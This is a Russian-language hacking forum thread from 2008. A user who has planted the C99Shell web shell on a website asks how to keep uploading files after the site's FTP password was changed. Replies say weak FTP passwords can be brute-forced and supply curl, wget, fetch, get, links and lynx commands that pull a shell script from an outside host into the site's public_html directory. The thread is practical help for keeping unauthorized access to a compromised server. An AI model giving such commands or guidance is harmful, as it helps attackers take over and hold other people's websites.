C99Shell

Discussion in 'Уязвимости' started by ttt0z, 29 Jul 2008.

  1. ttt0z

    ttt0z Member

    Joined:
    18 Nov 2007
    Messages:
    60
    Likes Received:
    10
    Reputations:
    -5
    Поставил на сайт C99Shell, пасс на фтп через какое-то время сменили, а файлы через шелл не заливаються, заливаються, только остаються с нулевым размером, Safe-mode: OFF (not secure), кто нибудь знает как исправить ситуацию?
    Реально ли подобрать пароль на фтп через FTP brute в этом шеле?
     
  2. LEE_ROY

    LEE_ROY Elder - Старейшина

    Joined:
    9 Nov 2006
    Messages:
    450
    Likes Received:
    188
    Reputations:
    26
    проверь или место на фтп есть, попобуй не залитвать новый файл а отредактировать старый, сбрутить реально если пасс несложный ессно ..
     
  3. ttt0z

    ttt0z Member

    Joined:
    18 Nov 2007
    Messages:
    60
    Likes Received:
    10
    Reputations:
    -5
    пробовал редактировать та же фигня (

    права на сам шелл -rwxr-xr-x, реально ли его перезаписать например на remview.php и залить нужные мне файлы?
     
  4. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    В этом шелле подсветка есть же зеленым куда можно писать и что можно редактировать, попробуй просто создать новый файл в директории, которая открыта на запись.
     
  5. none222

    none222 Guest

    Reputations:
    0
    Попробуй не заливать, а создать файл (если это текстовик(скрипт например)) с тем же контентом
     
  6. ttt0z

    ttt0z Member

    Joined:
    18 Nov 2007
    Messages:
    60
    Likes Received:
    10
    Reputations:
    -5
    fly, да директории все открыты на запись

    пробовал создавать фал, он создаеться но седержимое не записываеться ((( получаеться файл нулевого размера ... хз что делать...
     
  7. fly

    fly Member

    Joined:
    15 Apr 2007
    Messages:
    584
    Likes Received:
    95
    Reputations:
    -10
    а wget curl юзал!

    Попробуй curl --output /дира_куда_лить/shell.php http://xaker.com/shell.txt
     
  8. ttt0z

    ttt0z Member

    Joined:
    18 Nov 2007
    Messages:
    60
    Likes Received:
    10
    Reputations:
    -5
    че-то не работает (((

    вот так пишу и нажимую Экскуте
    curl --output /home/user/public_html/shell.php http://xaker.com/shell.txt

    так писать надо?
     
    2 people like this.
  9. blaga

    blaga Elder - Старейшина

    Joined:
    23 Mar 2006
    Messages:
    884
    Likes Received:
    273
    Reputations:
    106
    чтобы узнать какие качалки есть на серваке введи
    which lynx links get wget fetch curl
    получишь что то типа
    /usr/bin/links
    /usr/bin/wget
    /usr/bin/curl

    так не всегда может сработать. тогда вводи названия качалок по отдельности.


    а вот примеры разных заливок
    curl --output /[папка куда льем]/shell.php http://[откуда заливаем]/shell.txt
    fetch -o /[папка куда льем]/shell.php http://[откуда заливаем]/shell.txt
    wget -o /[папка куда льем]/shell.php http://[откуда заливаем]/shell.txt
    get http://[откуда заливаем]/shell.txt > /[папка куда льем]/shell.php
    links -source "http://[откуда заливаем]/shell.txt" > /[папка куда льем]/shell.php
    lynx -source http://[откуда заливаем]/shell.txt > /[папка куда льем]/shell.php


    пробуй.
     
    1 person likes this.